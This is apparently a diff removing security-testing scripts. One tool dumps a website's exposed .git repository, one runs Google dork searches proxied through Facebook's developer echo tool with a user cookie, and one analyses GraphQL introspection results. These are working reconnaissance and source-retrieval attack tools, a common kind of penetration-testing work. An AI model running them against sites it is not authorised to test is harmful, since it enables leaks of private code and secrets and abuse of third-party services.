    87  - dirname = output_dir + '/.git/objects/'+ object_id[0:2]
    88  - filename = dirname + '/' + object_id[2:]
    89  - # print(filename)
    90  - 
    91  - if not os.path.isdir(dirname):
    92  - try:
    93  - os.makedirs( dirname )
    94  - except Exception as e:
    95  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    96  - return False
    97  - 
    98  - fp = open( filename, 'wb')
    99  - fp.write( content )
    100  - fp.close()
    101  - 
    102  - return filename
    103  -#
    104  -###
    105  -#
    106  - 
    107  - 
    108  -import os
    109  -import sys
    110  -import argparse
    111  -import requests
    112  -import subprocess
    113  -from functools import partial
    114  -from urllib.parse import urlparse
    115  -from colored import fg, bg, attr
    116  -from multiprocessing.dummy import Pool
    117  - 
    118  - 
    119  -# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
    120  -from requests.packages.urllib3.exceptions import InsecureRequestWarning
    121  -requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    122  - 
    123  - 
    124  -#
    125  -### variables
    126  -#
    127  -max_threads = 5
    128  -t_extension = []
    129  -t_exclude = ['png','gif','jpg','jpeg','ico','svg','eot','otf','ttf','woff','woff2','css','sass','less','po','mo','mp3','mp4','mpeg','avi']
    130  - 
    131  -parser = argparse.ArgumentParser()
    132  -parser.add_argument( "-u","--url",help="url of the .git, example https://www.target.com/.git" )
    133  -parser.add_argument( "-t","--threads",help="threads, default: 5" )
    134  -parser.add_argument( "-e","--extension",help="extensions to download separated by comma, overwrite --exclude, default: all but default exclude" )
    135  -parser.add_argument( "-x","--exclude",help="extensions to exclude separated by comma, default: "+','.join(t_exclude) )
    136  -parser.add_argument( "-v","--verbose",help="verbose mode, default: off", action="store_true" )
    137  -args = parser.parse_args()
    139  - 
    140  -if args.url:
    141  - url = args.url
    142  - # url = args.url.strip('/')
    143  -else:
    144  - parser.error( 'url missing' )
    145  - 
    146  -if args.threads:
    147  - max_threads = int(args.threads)
    148  - 
    149  -if args.exclude:
    150  - t_extension = []
    151  - t_exclude = args.exclude.split(',')
    152  - 
    153  -if args.extension:
    154  - t_extension = args.extension.split(',')
    155  - t_exclude = []
    156  - 
    157  -if not url.startswith( 'http' ):
    158  - url = 'https://'+url
    159  - 
    160  -if args.verbose:
    161  - verbose = True
    162  -else:
    163  - verbose = False
    164  - 
    165  -git_url = url
    166  -t_url_parse = urlparse( url )
    167  -output_dir = os.getcwd() + '/' + t_url_parse.netloc
    168  -#
    169  -###
    170  -#
    171  - 
    172  - 
    173  -#
    174  -### init
    175  -#
    176  -if not os.path.isdir(output_dir):
    177  - try:
    178  - os.makedirs( output_dir )
    179  - except Exception as e:
    180  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    181  - exit()
    182  - 
    183  -sys.stdout.write( "%s[+] output directory: %s%s\n" % (fg('green'),output_dir,attr(0)) )
    184  - 
    185  - 
    186  -try:
    187  - cmd = 'cd ' + output_dir + '; git init'
    188  - output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    189  - sys.stdout.write( "[+] %s\n" % output.strip() )
    190  -except Exception as e:
    191  - sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
    192  - sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    193  - exit()
    194  -#
    195  -###
    196  -#
    197  - 
    198  - 
    199  -#
    200  -### create local repository
    201  -#
    202  -u = git_url + '/index'
    203  -r = downloadFile( u )
    204  -if not r:
    205  - sys.stdout.write( "%s[-] cannot find index file: %s%s\n" % (fg('red'),u,attr(0)) )
    206  - exit()
    207  -sys.stdout.write( "%s[+] index file found: %s%s\n" % (fg('green'),u,attr(0)) )
    208  - 
    209  -fp = open( output_dir+'/.git/index', 'wb' )
    210  -fp.write( r.content )
    211  -fp.close()
    212  - 
    213  -try:
    214  - cmd = 'cd ' + output_dir + '; git ls-files --stage | awk \'{print $2":"$4}\''
    215  - output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    216  - t_ls_files = output.split("\n")
    217  -except Exception as e:
    218  - sys.stdout.write( "%s[-] error occurred, cannot read the index%s\n" % (fg('red'),attr(0)) )
    219  - sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    220  - exit()
    221  -#
    222  -###
    223  -#
    224  - 
    225  - 
    226  -#
    227  -### main loop
    228  -#
    229  -t_multiproc = {
    230  - 'n_current': 0,
    231  - 'n_total': len(t_ls_files),
    232  - 'n_success': 0,
    233  - 'verbose': verbose,
    234  -}
    235  - 
    236  -pool = Pool( max_threads )
    237  -pool.map( partial(downloadOject,t_extension,t_exclude), t_ls_files )
    238  -pool.close()
    239  -pool.join()
    240  -#
    241  -###
    242  -#
    243  - 
    244  - 
    245  -sys.stdout.write( "%s[+] %d files successfully downloaded%s\n" % (fg('green'),t_multiproc['n_success'],attr(0)) )
    246  - 
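The object URL built in `downloadOject` relies on git's loose-object layout: the first two hex characters of the object id name the subdirectory under `objects/`, the remaining characters name the file. That mapping can be isolated as (the helper `loose_object_path` is illustrative, not part of the script):

```python
def loose_object_path(object_id):
    """Map a git object id to its loose-object path:
    objects/<first 2 hex chars>/<remaining chars>."""
    return 'objects/%s/%s' % (object_id[:2], object_id[2:])
```

This is why the script can fetch `.git/objects/e6/9de2...` for an object id taken from `git ls-files --stage`.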
  • ■ ■ ■ ■ ■ ■
    google-search.py
    1  -#!/usr/bin/python3
    2  - 
    3  -import os
    4  -import sys
    5  -import json
    6  -import argparse
    7  -import urllib.parse
    8  -from goop import goop
    9  -from functools import partial
    10  -from multiprocessing.dummy import Pool
    11  -from colored import fg, bg, attr
    12  - 
    13  -def banner():
    14  - print("""
    15  - _ _
    16  - __ _ ___ ___ __ _| | ___ ___ ___ __ _ _ __ ___| |__ _ __ _ _
    17  - / _` |/ _ \ / _ \ / _` | |/ _ \ / __|/ _ \/ _` | '__/ __| '_ \ | '_ \| | | |
    18  -| (_| | (_) | (_) | (_| | | __/ \__ \ __/ (_| | | | (__| | | | _ | |_) | |_| |
    19  - \__, |\___/ \___/ \__, |_|\___| |___/\___|\__,_|_| \___|_| |_| (_) | .__/ \__, |
    20  - |___/ |___/ |_| |___/
    21  - 
    22  - by @gwendallecoguic
    23  - 
    24  -""")
    26  - 
    27  -parser = argparse.ArgumentParser()
    28  -parser.add_argument( "-b","--nobanner",help="disable the banner", action="store_true" )
    29  -parser.add_argument( "-f","--file",help="source file that contains the dorks" )
    30  -parser.add_argument( "-t","--term",help="search term", action="append" )
    31  -parser.add_argument( "-d","--decode",help="urldecode the results", action="store_true" )
    32  -parser.add_argument( "-e","--endpage",help="search end page, default 50" )
    33  -parser.add_argument( "-s","--startpage",help="search start page, default 0" )
    34  -parser.add_argument( "-c","--fbcookie",help="your facebook cookie" )
    35  -parser.add_argument( "-o","--output",help="output file" )
    36  -parser.add_argument( "-n","--numbers-only",help="don't display the results, only how many results were found", action="store_true" )
    37  - 
    38  - 
    39  -args = parser.parse_args()
    41  - 
    42  -if not args.nobanner:
    43  - banner()
    44  - 
    45  -if args.startpage:
    46  - start_page = int(args.startpage)
    47  -else:
    48  - start_page = 0
    49  - 
    50  -if args.endpage:
    51  - end_page = int(args.endpage)
    52  -else:
    53  - end_page = 50
    54  - 
    55  -if args.fbcookie:
    56  - fb_cookie = args.fbcookie
    57  -else:
    58  - fb_cookie = os.getenv('FACEBOOK_COOKIE')
    59  -if not fb_cookie:
    60  - parser.error( 'facebook cookie is missing' )
    61  - 
    62  -if args.file:
    63  - if os.path.isfile(args.file):
    64  - fp = open( args.file, 'r' )
    65  - t_terms = fp.read().split('\n')
    66  - fp.close()
    67  - else:
    68  - parser.error( '%s file not found' % args.file )
    69  -elif args.term:
    70  - t_terms = args.term
    71  -else:
    72  - parser.error( 'term is missing' )
    73  - 
    74  -# -o implies counting mode; the -n test must not overwrite it
    75  -numbers_only = bool( args.output or args.numbers_only )
    83  - 
    84  -if args.decode:
    85  - urldecode = True
    86  -else:
    87  - urldecode = False
    88  - 
    89  -# print(fb_cookie)
    90  - 
    91  -def doMultiSearch( term, numbers_only, urldecode, page ):
    92  - zero_result = 0
    93  - for i in range(page-5,page-1):
    94  - if i != page and i in page_history and page_history[i] == 0:
    95  - zero_result = zero_result + 1
    96  - 
    97  - if zero_result < 3:
    98  - s_results = goop.search( term, fb_cookie, page, True )
    99  - # print(s_results)
    101  - page_history[page] = len(s_results)
    102  - if not numbers_only:
    103  - for i in s_results:
    104  - if urldecode:
    105  - print( urllib.parse.unquote(s_results[i]['url']) )
    106  - else:
    107  - print( s_results[i]['url'] )
    108  - else:
    109  - for i in range(page,end_page):
    110  - page_history[i] = 0
    111  - 
    112  -for term in t_terms:
    113  - page_history = {}
    114  - 
    115  - pool = Pool( 5 )
    116  - pool.map( partial(doMultiSearch,term,numbers_only,urldecode), range(start_page,end_page) )
    117  - pool.close()
    118  - pool.join()
    119  - 
    120  - if numbers_only:
    121  - n_results = sum( page_history.values() )
    122  - if n_results:
    123  - color = 'white'
    124  - else:
    125  - color = 'dark_gray'
    126  - 
    127  - full_url = 'https://www.google.com/search?q=' + urllib.parse.quote(term)
    128  - sys.stdout.write( '%s%s (%d)%s\n' % (fg(color),full_url,n_results,attr(0)) )
    129  - 
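`doMultiSearch` stops requesting further pages once three of the four preceding pages (page-5 through page-2) came back with zero results. The heuristic can be sketched on its own (hypothetical helper, not in the script):

```python
def should_stop(page_history, page, threshold=3):
    """Mirror doMultiSearch's early-stop check: skip this page once
    at least `threshold` of pages page-5..page-2 returned 0 results.
    `page_history` maps page number -> result count."""
    zero = sum(1 for i in range(page - 5, page - 1)
               if page_history.get(i) == 0)
    return zero >= threshold
```

Because pages are fetched by a thread pool rather than strictly in order, some entries in the window may be missing; `get()` treats those as "not yet known" rather than as empty pages.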
  • ■ ■ ■ ■ ■ ■
    goop/__init__.py
    1  -__version__ = '0.1.1'
    2  - 
  • ■ ■ ■ ■ ■ ■
    goop/goop.py
    1  -import re
    2  -import requests
    3  - 
    4  -try:
    5  - from urllib.parse import quote_plus as url_encode
    6  -except ImportError:
    7  - from urllib import quote_plus as url_encode
    8  - 
    9  -def decode_html(string):
    10  - "decode common html/xml entities"
    11  - new_string = string
    12  - decoded = ['>', '<', '"', '&', '\'']
    13  - encoded = ['&gt;', '&lt;', '&quot;', '&amp;', '&#039;']
    14  - for e, d in zip(encoded, decoded):
    15  - new_string = new_string.replace(e, d)
    16  - # second pass so double-encoded entities such as
    17  - # '&amp;gt;' are fully decoded
    18  - for e, d in zip(encoded[::-1], decoded[::-1]):
    19  - new_string = new_string.replace(e, d)
    18  - return new_string
    19  - 
    20  -def parse(string):
    21  - "extract and parse results"
    22  - parsed = {}
    23  -# pattern = r'''<div><div class="[^"]+">
    24  -# <div class="[^"]+"><a href="/url\?q=(.+?)&sa=[^"]+"><div class="[^"]+">(.*?)</div>
    25  -# <div class="[^"]+">.*?</div></a></div>
    26  -# <div class="[^"]+"></div>
    27  -# <div class="[^"]+"><div><div class="[^"]+"><div><div><div class="[^"]+">(?:(.*?)(?: ...)?</div>|\n<span class="[^"]+">.*?</span><span class="[^"]+">.*?</span>(.*?)</div>)'''
    28  - pattern = r'''<div class="[^"]+"><a href="/url\?q=(.+?)&sa=[^"]+">'''
    29  - matches = re.finditer(pattern, string)
    30  - num = 0
    31  - for match in matches:
    32  - # parsed[num] = {'url' : match.group(1), 'text' : match.group(2), 'summary' : match.group(3) or match.group(4)}
    33  - parsed[num] = {'url' : match.group(1), 'text' : '', 'summary' : ''}
    34  - num += 1
    35  - return parsed
    36  - 
    37  -def search(query, cookie, page=0, full=False):
    38  - """
    39  - main function, returns parsed results
    40  - Args:
    41  - query - search string
    42  - cookie - facebook cookie
    43  - page - search result page number (optional)
    44  - full - request unfiltered results, i.e. filter=0 (optional)
    45  - """
    45  - offset = page * 10
    46  - filter = 1 if not full else 0
    47  - escaped = url_encode('https://google.com/search?q=%s&start=%i&filter=%i' % (url_encode(query), offset, filter))
    48  - headers = {
    49  - 'Host': 'developers.facebook.com',
    50  - 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    51  - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    52  - 'Accept-Language': 'en-US,en;q=0.5',
    53  - 'Accept-Encoding': 'deflate',
    54  - 'Connection': 'keep-alive',
    55  - 'Cookie': cookie,
    56  - 'Upgrade-Insecure-Requests': '1',
    57  - 'Cache-Control': 'max-age=0',
    58  - 'TE': 'Trailers'
    59  - }
    60  - response = requests.get('https://developers.facebook.com/tools/debug/echo/?q=%s' % escaped, headers=headers)
    61  - cleaned_response = decode_html(response.text)
    62  - parsed = parse(cleaned_response)
    63  - return parsed
    64  - 
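`decode_html` runs two replacement passes so that double-encoded entities, such as the `&amp;gt;` sequences the echo endpoint can return, decode all the way down: the first pass turns `&amp;` into `&`, the second pass then resolves the entity that was hiding underneath. A condensed sketch of the same idea (the helper name `decode_twice` is ours):

```python
def decode_twice(string):
    """Two decode passes so double-encoded entities resolve fully:
    pass 1 turns '&amp;lt;' into '&lt;', pass 2 turns that into '<'."""
    pairs = [('&gt;', '>'), ('&lt;', '<'), ('&quot;', '"'),
             ('&amp;', '&'), ('&#039;', "'")]
    for _ in range(2):
        for enc, dec in pairs:
            string = string.replace(enc, dec)
    return string
```

A single pass would leave `&amp;lt;` stuck at `&lt;`, which would then break the regex-based result parsing.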
  • ■ ■ ■ ■ ■ ■
    graphql-introspection-analyzer.py
    1  -#!/usr/bin/python3
    2  - 
    3  -import sys
    4  -import os
    5  -import json
    6  -from termcolor import colored
    7  -from operator import attrgetter
    8  - 
    9  - 
    10  - 
    11  -def banner():
    12  - print("""
    13  - _ _ _
    14  - __ _ _ __ __ _ _ __ | |__ __ _| | __ _ _ __ __ _| |_ _ _______ _ __
    15  - / _` | '__/ _` | '_ \| '_ \ / _` | | / _` | '_ \ / _` | | | | |_ / _ \ '__|
    16  - | (_| | | | (_| | |_) | | | | (_| | | | (_| | | | | (_| | | |_| |/ / __/ |
    17  - \__, |_| \__,_| .__/|_| |_|\__, |_| \__,_|_| |_|\__,_|_|\__, /___\___|_|
    18  - |___/ |_| |_| |___/
    19  - 
    20  - by @gwendallecoguic
    21  - 
    22  -""")
    24  - 
    25  -banner()
    26  - 
    27  - 
    28  - 
    29  -class GraphqlObject:
    30  - name = ""
    31  - ttype = ""
    32  - args = []
    33  - attrs = []
    34  - values = []
    35  - inputs = []
    36  - 
    37  - def __init__( self ):
    38  - self.args = []
    39  - self.attrs = []
    40  - self.values = []
    41  - self.inputs = []
    42  - 
    43  -class GraphqlAttribut:
    44  - name = ""
    45  - ttype = ""
    46  - 
    47  -class GraphqlArgument:
    48  - name = ""
    49  - ttype = ""
    50  - 
    51  -class GraphqlValue:
    52  - name = ""
    53  - 
    54  - 
    55  -def usage( err='' ):
    56  - print( "1/ First step is to run the introspection query on the server, and store the JSON returned in a file.\n")
    57  - print( "GET:")
    58  - print( "/graphql?query={__schema{queryType{name},mutationType{name},subscriptionType{name},types{...FullType},directives{name,description,locations,args{...InputValue}}}},fragment%20FullType%20on%20__Type{kind,name,description,fields(includeDeprecated:true){name,description,args{...InputValue},type{...TypeRef},isDeprecated,deprecationReason},inputFields{...InputValue},interfaces{...TypeRef},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason},possibleTypes{...TypeRef}},fragment%20InputValue%20on%20__InputValue{name,description,type{...TypeRef},defaultValue},fragment%20TypeRef%20on%20__Type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}\n")
    59  - print( "POST:")
    60  - print( '{"query":"{__schema{queryType{name},mutationType{name},subscriptionType{name},types{...FullType},directives{name,description,locations,args{...InputValue}}}},fragment FullType on __Type{kind,name,description,fields(includeDeprecated:true){name,description,args{...InputValue},type{...TypeRef},isDeprecated,deprecationReason},inputFields{...InputValue},interfaces{...TypeRef},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason},possibleTypes{...TypeRef}},fragment InputValue on __InputValue{name,description,type{...TypeRef},defaultValue},fragment TypeRef on __Type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}","variables":{}}\n')
    61  - print( "2/ Then run this program.\n")
    62  - print( "Usage: %s <introspection file>" % sys.argv[0] )
    63  - if err:
    64  - print( "Error: %s!" % err )
    65  - print("")
    66  - sys.exit()
    67  - 
    68  - 
    69  -def displayTypeO( o ):
    70  - sys.stdout.write( colored("%s" % o.ttype, t_colors[o.ttype] if o.ttype in t_colors else default_color ) )
    71  - sys.stdout.write( " %s {\n" % o.name )
    72  - 
    73  - if len(o.attrs):
    74  - l = sorted( o.attrs, key=lambda w:attrgetter('name')(w).lower() )
    75  - for elt in l:
    76  - sys.stdout.write( " %s" % elt.name )
    77  - sys.stdout.write( colored(" %s" % elt.ttype, 'white') )
    78  - if not elt == l[-1]:
    79  - sys.stdout.write( "," )
    80  - sys.stdout.write( "\n" )
    81  - if len(o.inputs):
    82  - l = sorted( o.inputs, key=lambda w:attrgetter('name')(w).lower() )
    83  - for elt in l:
    84  - sys.stdout.write( " %s" % elt.name )
    85  - sys.stdout.write( colored(" %s" % elt.ttype, 'white') )
    86  - if not elt == l[-1]:
    87  - sys.stdout.write( "," )
    88  - sys.stdout.write( "\n" )
    89  - if len(o.values):
    90  - l = sorted( o.values, key=lambda w:attrgetter('name')(w).lower() )
    91  - for elt in l:
    92  - sys.stdout.write( " %s" % elt.name )
    93  - if not elt == l[-1]:
    94  - sys.stdout.write( "," )
    95  - sys.stdout.write( "\n" )
    96  - 
    97  - sys.stdout.write( "}\n\n" )
    98  - 
    99  - 
    100  -def displayTypeQM( o ):
    101  - sys.stdout.write( colored("%s" % o.ttype, t_colors[o.ttype] if o.ttype in t_colors else default_color ) )
    102  - sys.stdout.write( " %s (\n" % o.name )
    103  - 
    104  - if len(o.args):
    105  - l = sorted( o.args, key=lambda w:attrgetter('name')(w).lower() )
    106  - for elt in l:
    107  - sys.stdout.write( " %s" % elt.name )
    108  - sys.stdout.write( colored(" %s" % elt.ttype, 'white') )
    109  - if not elt == l[-1]:
    110  - sys.stdout.write( "," )
    111  - sys.stdout.write( "\n" )
    112  - 
    113  - sys.stdout.write( ")\n\n" )
    114  - 
    115  - 
    116  -# this is a list
    117  -t_keywords = [
    118  - 'Query','Mutation',
    119  - 'Boolean','String','ID','Float','Int',
    120  - '__Schema','__Type','__Field','__Directive','__EnumValue','__InputValue','__TypeKind','__DirectiveLocation'
    121  -]
    122  - 
    123  -# this is a dict
    124  -t_colors = {
    125  - 'QUERY': 'cyan',
    126  - 'MUTATION': 'red',
    127  - 'ENUM': 'yellow',
    128  - 'INTERFACE': 'blue',
    129  -}
    130  - 
    131  -default_color = 'green'
    132  - 
    133  -t_objects = []
    134  -t_queries = []
    135  -t_mutations = []
    136  - 
    137  - 
    138  -if len(sys.argv) != 2:
    139  - usage( 'introspection file not found' )
    140  - 
    141  -ifile = sys.argv[1]
    142  - 
    143  -if not os.path.isfile(ifile):
    144  - usage( 'introspection file not found' )
    145  - 
    146  -with open(ifile) as jfile:
    147  - data = json.load( jfile )
    148  - for v in data['data']['__schema']['types']:
    149  - if v['name'] == 'Query' or v['name'] == 'Mutation':
    150  - if 'fields' in v and type(v['fields']) is list and len(v['fields'])>0:
    151  - for vv in v['fields']:
    152  - o = GraphqlObject()
    153  - o.name = vv['name']
    154  - o.ttype = 'QUERY' if v['name'] == 'Query' else 'MUTATION'
    155  - 
    156  - if 'args' in vv and type(vv['args']) is list and len(vv['args'])>0:
    157  - for vvv in vv['args']:
    158  - if vvv['type']['name']:
    159  - ttype = vvv['type']['name']
    160  - elif vvv['type']['ofType']['name']:
    161  - ttype = vvv['type']['ofType']['name']
    162  - elif vvv['type']['ofType']['ofType']['name']:
    163  - ttype = vvv['type']['ofType']['ofType']['name']
    164  - elif vvv['type']['ofType']['ofType']['ofType']['name']:
    165  - ttype = vvv['type']['ofType']['ofType']['ofType']['name']
    166  - arg = GraphqlArgument()
    167  - arg.name = vvv['name']
    168  - arg.ttype = ttype
    169  - o.args.append( arg )
    170  - 
    171  - if o.ttype == 'QUERY':
    172  - t_queries.append( o )
    173  - else:
    174  - t_mutations.append( o )
    175  - else:
    176  - if v['name'] in t_keywords:
    177  - continue
    178  - 
    179  - o = GraphqlObject()
    180  - o.name = v['name']
    181  - o.ttype = v['kind']
    182  - 
    183  - if 'fields' in v and type(v['fields']) is list and len(v['fields'])>0:
    184  - for vv in v['fields']:
    185  - if vv['type']['name']:
    186  - ttype = vv['type']['name']
    187  - elif vv['type']['ofType']['name']:
    188  - ttype = vv['type']['ofType']['name']
    189  - elif vv['type']['ofType']['ofType']['name']:
    190  - ttype = vv['type']['ofType']['ofType']['name']
    191  - elif vv['type']['ofType']['ofType']['ofType']['name']:
    192  - ttype = vv['type']['ofType']['ofType']['ofType']['name']
    193  - attr = GraphqlAttribut()
    194  - attr.name = vv['name']
    195  - attr.ttype = ttype
    196  - o.attrs.append( attr )
    197  - 
    198  - if 'inputFields' in v and type(v['inputFields']) is list and len(v['inputFields'])>0:
    199  - for vv in v['inputFields']:
    200  - if vv['type']['name']:
    201  - ttype = vv['type']['name']
    202  - elif vv['type']['ofType']['name']:
    203  - ttype = vv['type']['ofType']['name']
    204  - elif vv['type']['ofType']['ofType']['name']:
    205  - ttype = vv['type']['ofType']['ofType']['name']
    206  - elif vv['type']['ofType']['ofType']['ofType']['name']:
    207  - ttype = vv['type']['ofType']['ofType']['ofType']['name']
    208  - i = GraphqlAttribut()
    209  - i.name = vv['name']
    210  - i.ttype = ttype
    211  - o.inputs.append( i )
    212  - 
    213  - if 'enumValues' in v and type(v['enumValues']) is list and len(v['enumValues'])>0:
    214  - for vv in v['enumValues']:
    215  - value = GraphqlValue()
    216  - value.name = vv['name']
    217  - o.values.append( value )
    218  - 
    219  - t_objects.append( o )
    220  - 
    221  -if len(t_objects):
    222  - l = sorted( t_objects, key=lambda w:attrgetter('name')(w).lower() )
    223  - for o in l:
    224  - displayTypeO( o )
    225  - 
    226  -if len(t_queries):
    227  - l = sorted( t_queries, key=lambda w:attrgetter('name')(w).lower() )
    228  - for q in l:
    229  - displayTypeQM( q )
    230  - 
    231  -if len(t_mutations):
    232  - l = sorted( t_mutations, key=lambda w:attrgetter('name')(w).lower() )
    233  - for m in l:
    234  - displayTypeQM( m )
    235  - 
    236  - 
    237  -# query IntrospectionQuery {
    238  -# __schema {
    239  -# queryType { name }
    240  -# mutationType { name }
    241  -# subscriptionType { name }
    242  -# types {
    243  -# ...FullType
    244  -# }
    245  -# directives {
    246  -# name
    247  -# description
    248  -# locations
    249  -# args {
    250  -# ...InputValue
    251  -# }
    252  -# }
    253  -# }
    254  -# }
    255  - 
    256  -# fragment FullType on __Type {
    257  -# kind
    258  -# name
    259  -# description
    260  -# fields(includeDeprecated: true) {
    261  -# name
    262  -# description
    263  -# args {
    264  -# ...InputValue
    265  -# }
    266  -# type {
    267  -# ...TypeRef
    268  -# }
    269  -# isDeprecated
    270  -# deprecationReason
    271  -# }
    272  -# inputFields {
    273  -# ...InputValue
    274  -# }
    275  -# interfaces {
    276  -# ...TypeRef
    277  -# }
    278  -# enumValues(includeDeprecated: true) {
    279  -# name
    280  -# description
    281  -# isDeprecated
    282  -# deprecationReason
    283  -# }
    284  -# possibleTypes {
    285  -# ...TypeRef
    286  -# }
    287  -# }
    288  - 
    289  -# fragment InputValue on __InputValue {
    290  -# name
    291  -# description
    292  -# type { ...TypeRef }
    293  -# defaultValue
    294  -# }
    295  - 
    296  -# fragment TypeRef on __Type {
    297  -# kind
    298  -# name
    299  -# ofType {
    300  -# kind
    301  -# name
    302  -# ofType {
    303  -# kind
    304  -# name
    305  -# ofType {
    306  -# kind
    307  -# name
    308  -# ofType {
    309  -# kind
    310  -# name
    311  -# ofType {
    312  -# kind
    313  -# name
    314  -# ofType {
    315  -# kind
    316  -# name
    317  -# ofType {
    318  -# kind
    319  -# name
    320  -# }
    321  -# }
    322  -# }
    323  -# }
    324  -# }
    325  -# }
    326  -# }
    327  -# }
    328  - 
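The analyzer resolves each field's named type by walking up to four hardcoded `elif` levels of `ofType`. Since GraphQL wraps named types in arbitrarily nested NON_NULL and LIST wrappers, a loop is more robust and also avoids using a stale `ttype` when no level matches. A sketch (the helper `named_type` is hypothetical, not part of the script):

```python
def named_type(type_ref):
    """Unwrap NON_NULL/LIST wrappers by following 'ofType' until a
    named type is reached; returns None if the chain runs out."""
    while type_ref and not type_ref.get('name'):
        type_ref = type_ref.get('ofType')
    return type_ref['name'] if type_ref else None
```

This matches what the `TypeRef` fragment in the commented introspection query is fetching: each `ofType` level exists precisely so the client can unwrap it.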